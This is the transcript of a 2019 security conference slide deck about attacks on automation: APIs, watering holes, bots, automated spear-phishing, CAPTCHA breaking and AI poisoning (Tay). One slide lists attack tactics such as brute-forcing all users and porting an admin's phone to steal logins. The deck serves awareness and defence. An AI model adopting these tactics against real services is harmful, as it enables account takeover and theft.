Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of...
Transcript of Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of...
![Page 1: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/1.jpg)
April 2, 2019
Carl Herberger
Targeting the Hidden Attack Surface of Automation
![Page 2: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/2.jpg)
![Page 3: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/3.jpg)
![Page 4: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/4.jpg)
Davos Risk to World 2019
![Page 5: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/5.jpg)
5
OWASP Top-21 Automated Threats
Credential Cracking
Credential Stuffing
Account Creation
Account Aggregation
Token Cracking
Denial of Inventory
Scalping
Sniping
Data Scraping
Skewing
Spamming
CAPTCHA Defeat
Ad Fraud
Expediting
Carding
Card Cracking
Cashing Out
Fingerprinting
Footprinting
Vulnerability Scanning
Denial of Service
Account Takeover Availability of Inventory Abuse of Functionality
Payment Data Abuse Vulnerability Identification Resource Depletion
![Page 6: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/6.jpg)
![Page 7: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/7.jpg)
Targeting the Hidden Attack Surface of Automation
Chapter A
API
Chapter B
Watering Holes
Chapter C
May the Best Bot Win
Chapter E
AI vs. AIChapter D
The Human on Speed
![Page 8: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/8.jpg)
Targeting the Hidden Attack Surface of Automation
Chapter A
APIs
The Hidden Surface of
Attacking APIs
![Page 9: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/9.jpg)
The API Economy
WEBSITES MOBILE APPS
API
![Page 10: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/10.jpg)
![Page 11: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/11.jpg)
Drivers for API Growth
DevOps Fog ComputingSDN
![Page 12: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/12.jpg)
Dependencies Increase the Blast Radius of the attack
API Parameter Tampering - Hackers are often use this
technique to either reverse engineer an API or gain further access to sensitive data.
Session Cookie Tampering - These attacks attempt to exploit cookies in
order to bypass security mechanisms or send false data to application servers.
Man-in-the-Middle Attacks -Eavesdropping on an unencrypted connection between an API client and server, hackers can access sensitive data
DDoS Attacks -Poorly written code can be used to consume computer resources by sending invalid input parameters, subsequently causing a disruption to the API-supported Web application.
Content Manipulation - By
injecting malicious content (e.g., poisoning JSON Web tokens), exploits can be distributed and executed in the background.
![Page 13: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/13.jpg)
![Page 14: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/14.jpg)
Targeting the Hidden Attack Surface of Automation
Chapter B
Watering Holes
Attacking
Proxies
![Page 15: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/15.jpg)
The Watering Hole Examples
App Stores Security Update Services
Public Code Repositories
Web Analytics Platforms
Identity and Access Single Sign
On Platforms
Open Source Code
3rd Party Vendors in
Website
![Page 16: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/16.jpg)
16
Watering Hole Attacks
![Page 17: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/17.jpg)
![Page 18: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/18.jpg)
Attacking the Side Channels
• DDoS the Analytics company
• Brute force attack ALL users
• Port Admin’s Phone and steal logins
• Massive load on “page dotting”
• Brute force all 3rd party companies of site
• Use large Botnets to “learn” ins and outs
![Page 19: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/19.jpg)
Targeting the Hidden Attack Surface of Automation
Chapter C
May the Best Bot
WinBot vs. Bot
![Page 20: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/20.jpg)
![Page 21: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/21.jpg)
Bot Management is YOUR future
What do good bots do?
• Search Engines• Pricing Services• Fulfillment
Bad Bots29%
Good Bots23%
Humans 48%
~30% of the internet traffic is generated by bad bots
4 in 5 organizations cannot distinguish between ‘good’ & ‘bad’ bots
![Page 22: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/22.jpg)
The Rise of the IoT Botnets
![Page 23: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/23.jpg)
23
The Rise of Automated HTTP Bot Threats
75%
For some organizations,bots represent more than 75% of their total traffic
79%
79% organizations cannot distinguish between ‘good’
bots and ‘bad’ ones
WHAT CAN BOTS DO?
1. DDOS ATTACKS
2. ACCOUNT TAKEOVER
3. DATA THEFT
4. WEBSCRAPING
5. BRUTEFORCE
![Page 24: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/24.jpg)
Targeting the Hidden Attack Surface of Automation
Chapter D
The Human
on Speed
When User Error or People Attack
Automation
![Page 25: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/25.jpg)
DevOps and User Error
![Page 26: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/26.jpg)
Automated Social Engineering (ASE)
![Page 27: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/27.jpg)
Automated Social Engineering (ASE)
SNAP_R – Automated Spear-Phishing
• Man vs Machine – 2 hour bake off
• SNAP_R
– 819 tweets
– 6.85 simulated spear-phishing tweets/minute
– 275 victims
• Forbes staff writer Thomas Fox-Brewster
– 200 tweets
– 1.67 copy/pasted tweets/minute
– 49 victims
![Page 28: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/28.jpg)
Automated Social Engineering (ASE) Breaking CAPTCHA
2012: Support Vector Machines (SVM) to break reCAPTCHA
82% accuracy Cruz, Uceda, Reyes
2016: Breaking simple-captcha using Deep Learning92% accuracy How to break a captcha system using Torch
2016: I’m not Human - breaking the Google reCAPTCHA
![Page 29: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/29.jpg)
Targeting the Hidden Attack Surface of Automation
Chapter E
AI vs. AI
![Page 30: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/30.jpg)
“If you're not concerned about AI safety, you should be. Vastly more risk than North Korea”Elon Musk, August 2017
![Page 31: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/31.jpg)
The Evolution of AI
Neural Networks | Machine Learning | Deep Learning
![Page 32: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/32.jpg)
32
Poisoning AttackMarch 2016 – Microsoft unveiled TayAn innocent chatbot (twitterbot)An experiment in conversational understanding
It took less than 24 hours before the community corrupted an innocent AI chatbot
https://i.kym-cdn.com/photos/images/original/001/096/674/ef9.jpg
![Page 33: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/33.jpg)
Fooling AI
![Page 34: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/34.jpg)
![Page 35: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/35.jpg)
Targeting the Hidden Attack Surface of Automation
Chapter A
APIsChapter B
Watering Holes
Chapter C
May the Best Bot
Win
Chapter E
AI vs. AIChapter D
The Human on Speed
Automation is already changing our world. We should change the way we think about security accordingly.
![Page 36: Targeting the Hidden Attack Surface of Automation · Targeting the Hidden Attack Surface of Automation Chapter A APIs Chapter B Watering Holes Chapter C May the Best Bot Win Chapter](https://reader033.fdocuments.us/reader033/viewer/2022060210/5f04ac357e708231d40f2271/html5/thumbnails/36.jpg)
Thank you